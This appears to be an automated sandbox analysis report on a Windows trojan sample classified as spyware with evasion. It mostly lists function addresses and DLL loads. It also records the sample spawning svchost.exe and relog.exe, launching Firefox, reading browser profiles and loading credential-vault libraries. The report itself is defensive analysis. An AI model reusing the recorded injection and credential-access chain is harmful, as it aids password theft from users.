Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330100	3_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033C8158	3_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F41A2	3_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_034001AA	3_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F81CC	3_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D2000	3_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340770	3_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03364750	3_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333C7C0	3_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335C6E0	3_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340535	3_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03400591	3_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E4420	3_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F2446	3_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EE4F6	3_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FAB40	3_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F6BD7	3_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333EA80	3_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03356962	3_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033429A0	3_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0340A9A6	3_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334A840	3_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03342840	3_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033268B8	3_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0336E8F0	3_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03360F30	3_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E2F30	3_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03382F28	3_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B4F40	3_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033BEFA0	3_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334CFE0	3_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03332FC8	3_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FEE26	3_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340E59	3_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03352E90	3_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FCE93	3_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FEEDB	3_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DCD1F	3_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334AD00	3_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03358DBF	3_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0333ADE0	3_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03340C00	3_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E0CB5	3_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03330CF2	3_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F132D	3_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332D34C	3_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0338739A	3_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033452A0	3_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E12ED	3_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335B2C0	3_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0340B16B	3_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0332F172	3_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0337516C	3_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0334B1B0	3_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F70E9	3_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FF0E0	3_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EF0CC	3_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033470C0	3_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FF7B0	3_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03385630	3_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F16CC	3_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F7571	3_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DD5B0	3_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FF43F	3_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03331460	3_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FFB76	3_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335FB80	3_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B5BF0	3_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0337DBF9	3_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B3A6C	3_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FFA49	3_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F7A46	3_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033DDAAC	3_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03385AA0	3_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033E1AA3	3_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033EDAC6	3_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033D5910	3_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03349950	3_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335B950	3_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033AD800	3_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033438E0	3_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FFF09	3_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FFFB1	3_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03341F92	3_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03303FD2	3_2_03303FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03303FD5	3_2_03303FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03349EB0	3_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F7D73	3_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033F1D5A	3_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03343D40	3_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_0335FDC0	3_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033B9C32	3_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_033FFCF2	3_2_033FFCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D902C0	6_2_02D902C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB0274	6_2_02DB0274
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D1E3F0	6_2_02D1E3F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DD03E6	6_2_02DD03E6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCA352	6_2_02DCA352
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DA2000	6_2_02DA2000
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC81CC	6_2_02DC81CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DD01AA	6_2_02DD01AA
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D98158	6_2_02D98158
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DAA118	6_2_02DAA118
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D00100	6_2_02D00100
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D2C6E0	6_2_02D2C6E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D0C7C0	6_2_02D0C7C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D34750	6_2_02D34750
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D10770	6_2_02D10770
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DBE4F6	6_2_02DBE4F6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC2446	6_2_02DC2446
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB4420	6_2_02DB4420
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DD0591	6_2_02DD0591
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D10535	6_2_02D10535
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D0EA80	6_2_02D0EA80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC6BD7	6_2_02DC6BD7
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCAB40	6_2_02DCAB40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D3E8F0	6_2_02D3E8F0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02CF68B8	6_2_02CF68B8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D1A840	6_2_02D1A840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D12840	6_2_02D12840
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D129A0	6_2_02D129A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DDA9A6	6_2_02DDA9A6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D26962	6_2_02D26962
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCEEDB	6_2_02DCEEDB
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D22E90	6_2_02D22E90
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCCE93	6_2_02DCCE93
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D10E59	6_2_02D10E59
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCEE26	6_2_02DCEE26
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D02FC8	6_2_02D02FC8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D1CFE0	6_2_02D1CFE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D8EFA0	6_2_02D8EFA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D84F40	6_2_02D84F40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D30F30	6_2_02D30F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB2F30	6_2_02DB2F30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D52F28	6_2_02D52F28
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D00CF2	6_2_02D00CF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB0CB5	6_2_02DB0CB5
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D10C00	6_2_02D10C00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D0ADE0	6_2_02D0ADE0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D28DBF	6_2_02D28DBF
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DACD1F	6_2_02DACD1F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D1AD00	6_2_02D1AD00
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D2B2C0	6_2_02D2B2C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB12ED	6_2_02DB12ED
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D152A0	6_2_02D152A0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D5739A	6_2_02D5739A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02CFD34C	6_2_02CFD34C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC132D	6_2_02DC132D
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D170C0	6_2_02D170C0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DBF0CC	6_2_02DBF0CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC70E9	6_2_02DC70E9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCF0E0	6_2_02DCF0E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D1B1B0	6_2_02D1B1B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DDB16B	6_2_02DDB16B
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D4516C	6_2_02D4516C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02CFF172	6_2_02CFF172
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC16CC	6_2_02DC16CC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCF7B0	6_2_02DCF7B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D01460	6_2_02D01460
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCF43F	6_2_02DCF43F
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DAD5B0	6_2_02DAD5B0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC7571	6_2_02DC7571
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DBDAC6	6_2_02DBDAC6
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D55AA0	6_2_02D55AA0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DADAAC	6_2_02DADAAC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DB1AA3	6_2_02DB1AA3
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCFA49	6_2_02DCFA49
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC7A46	6_2_02DC7A46
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D83A6C	6_2_02D83A6C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D85BF0	6_2_02D85BF0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D4DBF9	6_2_02D4DBF9
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D2FB80	6_2_02D2FB80
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCFB76	6_2_02DCFB76
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D138E0	6_2_02D138E0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D7D800	6_2_02D7D800
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D19950	6_2_02D19950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D2B950	6_2_02D2B950
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DA5910	6_2_02DA5910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D19EB0	6_2_02D19EB0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D11F92	6_2_02D11F92
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCFFB1	6_2_02DCFFB1
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCFF09	6_2_02DCFF09
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DCFCF2	6_2_02DCFCF2
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D89C32	6_2_02D89C32
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D2FDC0	6_2_02D2FDC0
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC1D5A	6_2_02DC1D5A
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02D13D40	6_2_02D13D40
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02DC7D73	6_2_02DC7D73
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A1A30	6_2_004A1A30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049C910	6_2_0049C910
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049AB10	6_2_0049AB10
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049CB30	6_2_0049CB30
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049AC5C	6_2_0049AC5C
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_0049AC60	6_2_0049AC60
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A5110	6_2_004A5110
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004A3310	6_2_004A3310
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_004BB860	6_2_004BB860
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2E263	6_2_02B2E263
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2E144	6_2_02B2E144
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2D6C8	6_2_02B2D6C8
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2E5FC	6_2_02B2E5FC
Source: C:\Windows\SysWOW64\relog.exe	Code function: 6_2_02B2C978	6_2_02B2C978

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0332B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03375130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 033AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03387E54 appears 103 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02D7EA12 appears 86 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02D57E54 appears 102 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02D45130 appears 58 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02CFB970 appears 277 times
Source: C:\Windows\SysWOW64\relog.exe	Code function: String function: 02D8F290 appears 105 times
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: String function: 00A30AE3 appears 70 times
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: String function: 00A17DE1 appears 35 times
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: String function: 00A38900 appears 42 times

Source: XeFYBYYj0w.exe, 00000000.00000003.1331867203.0000000003D2D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs XeFYBYYj0w.exe
Source: XeFYBYYj0w.exe, 00000000.00000003.1329966526.0000000003B83000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs XeFYBYYj0w.exe

Source: XeFYBYYj0w.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@11/9

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A7A06A GetLastError,FormatMessageW,

0_2_00A7A06A

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A681CB AdjustTokenPrivileges,CloseHandle,		0_2_00A681CB
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Code function: 0_2_00A687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00A687E1

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A7B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00A7B3FB

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A8EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00A8EE0D

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A883BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00A883BB

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Code function: 0_2_00A14E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00A14E89

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut22C2.tmp

Jump to behavior

Source: XeFYBYYj0w.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: relog.exe, 00000006.00000003.1826641477.0000000002900000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3145583300.00000000028DF000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3145583300.0000000002930000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000003.1828732109.000000000290B000.00000004.00000020.00020000.00000000.sdmp, relog.exe, 00000006.00000002.3145583300.0000000002900000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: XeFYBYYj0w.exe	Virustotal: Detection: 65%
Source: XeFYBYYj0w.exe	ReversingLabs: Detection: 76%

Source: unknown	Process created: C:\Users\user\Desktop\XeFYBYYj0w.exe "C:\Users\user\Desktop\XeFYBYYj0w.exe"
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XeFYBYYj0w.exe"
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XeFYBYYj0w.exe"	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\XeFYBYYj0w.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe	Section loaded: dnsapi.dll	Jump to behavior
